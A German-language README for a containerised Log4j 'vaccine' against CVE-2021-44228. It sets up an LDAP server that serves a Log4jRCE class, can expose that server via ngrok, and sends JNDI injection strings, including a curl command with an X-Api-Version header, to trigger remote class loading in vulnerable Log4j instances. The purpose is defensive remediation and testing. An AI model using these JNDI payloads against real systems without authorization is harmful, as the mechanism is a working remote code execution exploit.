
Docker Compose-Lösung zur Ausführung einer Vaccine-Umgebung für die log4j2-Sicherheitslücke CVE-2021-44228
Eine containerisierte Methode, um den von Cyberreason angebotenen Log4j-Impfstoff auszuführen
Klonen Sie dieses Repository:
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
Bearbeiten Sie die Datei containers.env, um eine korrekte private oder öffentliche IP/DNS einzutragen, die Ihr Ziel erreichen kann. Der Standardeintrag wird für Sie wahrscheinlich nicht funktionieren!
Erstellen und starten Sie die Container:
docker-compose -f docker-compose.yml -p vaccine up
Sie haben nun einen lauschenden LDAP-Server, der die Log4jRCE-Klasse bereitstellt, um eine anfällige Log4j-Instanz zu immunisieren.
Sie können dies (wenn Sie möchten) mit ngrok dem Internet zugänglich machen.
ngrok tcp 1389
Sie können eine anfällige Log4j-Instanz mit der berüchtigten JNDI-Eingabezeichenfolge an diese Adresse senden:
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
Es gibt eine absichtlich anfällige Version von Log4j in einem Container unter:
Sie können deren Anweisungen befolgen, um sie zu starten und für Tests zu verwenden:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
Und lösen Sie die Immunisierung aus über:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'